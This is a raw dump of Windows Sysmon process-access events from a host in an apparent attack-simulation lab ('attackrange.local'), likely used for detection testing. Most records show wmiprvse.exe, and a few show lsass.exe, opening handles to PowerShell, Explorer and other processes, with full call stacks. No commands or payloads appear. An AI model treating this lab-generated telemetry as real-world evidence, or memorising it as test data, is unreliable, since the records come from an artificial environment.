16:54:42.670{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-CAAA-00000000AD01}12336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242279Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242278Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.654{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6DD2-603E-CCAA-00000000AD01}14264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242277Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.654{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6DD2-603E-CCAA-00000000AD01}14264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242276Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242275Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242274Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242273Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242272Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242271Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242270Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242269Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242268Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242267Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242266Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242265Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242264Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242263Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242262Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242261Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242260Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 